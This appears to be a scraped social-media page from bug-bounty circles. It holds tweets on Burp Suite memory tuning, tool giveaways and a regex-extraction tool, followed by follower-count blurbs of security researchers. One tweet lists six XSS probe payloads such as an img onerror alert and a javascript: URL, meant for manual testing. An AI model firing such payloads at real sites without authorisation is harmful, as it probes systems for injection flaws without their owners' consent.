About @Burp_Suite and your RAM...
Over time, Java deliberately uses all the RAM you feed it, in order to minimise CPU cycles spent freeing memory. To feed it less memory, you can use the -XX:MaxRAMPercentage argument. For other RAM tips see:
portswigger.net/burp/documenta…
With #NahamCon2022EU coming up I think it’s only fair to giveaway a one year subscription to @PentesterLab to someone random responding to this tweet. 👇🏽
🎉New Website published🎉
🎁To celebrate the launch of the new website, we are giving away three annual Burp Bounty Pro licenses!
👉To participate you have to retweet and like. The winners will be announced on September 30.
👉burpbounty.net
Don't always overcomplicate things! 👀
@G0053me found an SSRF on a target that 1000s of hackers had already hunted on. I asked him what his secret was and this is what he said! 🤯
#bugbounty#bugbountytips 👇
Here's a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on:
- URL query, fragment & path;
- all input fields.
If anyone needs to extract regex patterns from a list of urls, I wrote a tool for it.
github.com/iustin24/rextr…
It's pretty fast and also supports PCRE.
47 Followers 520 FollowingRisen from silence. Built on pain. Hunting in code. I am the C0deRevenant
💻 Security Researcher | Bug Bounty Hunter | Hackathon Enthusiast | @IITGuwahati
22K Followers 69 FollowingA 'by Hackers for Hackers' podcast focused on technical content ranging from bug bounty tips, to write-up explanations, to the latest exploitation techniques.
15K Followers 55 FollowingAggregates news from medias like MyRepublica, The Himalayan Times, Kathmandu Post, RatoPati, SetoPati, The Guardian, Al Jazeera, etc.
233K Followers 1K FollowingCofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
37K Followers 125 FollowingDetect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
10K Followers 1K FollowingCyber Security Engineer II at Uber Inc. CISSP, BSCP, OSCP, CCIE. Penetration Testing, Bug Bounty and AI Security Enthusiast. Husband and dog lover.
3K Followers 188 Following🌐 Former Web Application Security Researcher
🛡️ I help(ed) secure websites through bug bounties and freelance
quit hacking btw
42K Followers 286 FollowingYapping about AI, AppSec, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my cat's • Part-time shitposter
10K Followers 254 Followingsecurity enthusiast that loves hunting for bugs in the wild. co-founder and player of @justCatTheFish.
infosec at @google. opinions are mine.
12K Followers 35 FollowingHacksplained is an intro to hacking by @PascalSec
📺 https://t.co/pVsQptuz2d
💖 https://t.co/uQl641e6Li
🥨 https://t.co/qh5mPse7N5
No recent Favorites. New Favorites will appear here.